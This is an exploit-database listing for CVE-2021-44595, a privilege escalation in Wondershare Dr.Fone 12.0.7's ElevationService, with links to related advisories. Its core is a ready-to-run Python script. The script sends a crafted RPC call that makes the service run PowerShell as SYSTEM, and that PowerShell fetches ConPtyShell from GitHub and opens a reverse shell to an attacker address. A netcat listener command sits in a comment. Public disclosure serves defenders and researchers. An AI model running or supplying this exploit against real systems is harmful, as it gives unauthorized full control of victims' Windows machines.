Lucene search
Netanel CohenEDB-ID:50912HistoryMay 11, 2022 - 12:00 a.m.
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
2022-05-1100:00:00
Netanel Cohen
www.exploit-db.com
367
wondershare dr.fone
privilege escalation
elevationservice
incorrect access control
arbitrary code
system privileges
windows 10
cve 2021-44595
AI Score
7.4
Confidence
Low
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References: https://github.com/netanelc305/WonderShell
#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.
#!/bin/python3
import msgpackrpc
LADDR = "192.168.14.129"
LPORT = 1338
RADDR = "192.168.14.137"
RPORT = 12345
param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s','powershell',param)
# stty raw -echo; (stty size; cat) | nc -lvnp 1338Related
prion
prion
Improper access control
2022-04-29 12:15:00
nvd
nvd
CVE-2021-44595
2022-04-29 12:15:07
cvelist
cvelist
CVE-2021-44595
2022-04-29 11:23:46
cve
cve
CVE-2021-44595
2022-04-29 12:15:07
packetstorm
packetstorm
Wondershare Dr.Fone 12.0.7 Privilege Escalation
2022-05-11 00:00:00
zdt
zdt
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Exploit
2022-05-12 00:00:00